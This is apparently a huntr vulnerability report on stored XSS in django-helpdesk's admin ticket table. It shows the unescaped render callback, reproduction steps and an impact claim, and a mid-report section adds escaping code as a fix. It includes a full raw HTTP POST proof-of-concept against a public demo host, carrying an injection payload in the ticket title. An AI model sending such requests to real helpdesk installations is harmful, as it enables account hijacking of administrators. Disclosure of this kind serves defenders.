Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk

huntr report 745F483C-70ED-441F-AB2E-7AC1305439A4
Reported by: noobpk
Date: Nov 03, 2021 - 07:33
Source: www.huntr.dev
Tags: xss, stored, javascript, payload, security, vulnerability, admin, user account, csrf token, unauthorized access, bug bounty

EPSS: 0.001
Percentile: 33.1%

Description

Stored XSS via the [title] parameter when creating a new ticket.

Details

In the admin ticket table, the value rendered for the [Ticket] column is inserted into the page without HTML escaping, which allows arbitrary JavaScript execution.

Vulnerability code

// DataTables column definition: row.title is concatenated into HTML unescaped
{
    data: "ticket",
    render: function (data, type, row, meta) {
        if (type === 'display') {
            data = '<div><a href>' +
                row.id + '. ' +
                row.title + '</a></div>';
        }
        return data
    }
},

Rendered output when [title] contains the payload

<td><div><a href="/tickets/57832/">57832. "&gt;<img src></a></div></td>
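The fix for a render callback like the one above is to HTML-escape every untrusted value before it is concatenated into markup. The following is an added example, not django-helpdesk's own code: it places the page's vulnerable callback beside a hardened version and checks both against the report's payload shape. The escaping helper, the `/tickets/<id>/` href scheme, the `containsInjectedTag` check and the sample row are assumptions constructed for the demonstration.

```javascript
// Added example (not django-helpdesk's own code): the report's render callback
// beside a hardened version that HTML-escapes every row value it interpolates.

// Minimal HTML escaper for text placed into element content or a
// double-quoted attribute value (assumed helper, not from the project).
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable form as shown in the report: row.title goes into the markup raw.
function renderTicketVulnerable(data, type, row) {
  if (type === 'display') {
    data = '<div><a href>' + row.id + '. ' + row.title + '</a></div>';
  }
  return data;
}

// Hardened form: every untrusted value is escaped before interpolation, and
// the href is built from the numeric id only (URL scheme is an assumption).
function renderTicketSafe(data, type, row) {
  if (type === 'display') {
    const id = Number.parseInt(row.id, 10);
    const href = Number.isInteger(id) ? '/tickets/' + id + '/' : '#';
    data = '<div><a href="' + escapeHtml(href) + '">' +
      escapeHtml(row.id) + '. ' + escapeHtml(row.title) + '</a></div>';
  }
  return data;
}

// Crude check for the demo: does the rendered HTML contain any tag other than
// the div/a wrapper the renderer is supposed to emit?
function containsInjectedTag(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.some(t => !/^<\/?(div|a)(\s|>)/.test(t));
}

// Constructed sample row using the payload shape from the report.
const sampleRow = { id: 57832, title: '"><img src>' };

// Renders the sample row both ways and reports whether a foreign tag got in.
function demo() {
  const bad = renderTicketVulnerable('ticket', 'display', sampleRow);
  const good = renderTicketSafe('ticket', 'display', sampleRow);
  return {
    bad,
    good,
    badInjects: containsInjectedTag(bad),
    goodInjects: containsInjectedTag(good),
  };
}

console.log(demo());
```

Escaping at the point where the string is assembled is the key property; DataTables also ships a built-in `DataTable.render.text()` renderer that escapes cell data for exactly this situation, which is the simpler choice when no custom markup is needed.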

Proof of Concept

// PoC.req
POST /tickets/submit/ HTTP/1.1
Host: django-helpdesk-demo.herokuapp.com
Cookie: csrftoken=5xfltA7UxP3sMJG5OHKCAlHRzR9mrrUbXWfwOrJJl6JhC3OszzsZBcFMEmbCsIeh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-helpdesk-demo.herokuapp.com/tickets/submit/
Content-Type: multipart/form-data; boundary=---------------------------35329910622610784793670383726
Content-Length: 1150
Origin: https://django-helpdesk-demo.herokuapp.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="csrfmiddlewaretoken"

Sn6i713aQfmhgW3ET6Q39tRXE3yt0kePKM6tsSFZEw266gb1EYyqakPSJyAJ1ByV
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="queue"

1
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="title"

"&gt;<img src>
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="body"

test
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="priority"

3
-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="due_date"


-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="attachment"; filename=""
Content-Type: application/octet-stream


-----------------------------35329910622610784793670383726
Content-Disposition: form-data; name="submitter_email"

[email protected]
-----------------------------35329910622610784793670383726--

Steps to Reproduce

Go to the ticket-creation URL without logging in: https://django-helpdesk-demo.herokuapp.com/tickets/submit/

In the field [Summary of the problem], enter the payload: "&gt;<img src>

The XSS triggers when the admin loads the list of all tickets.

Impact

This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.
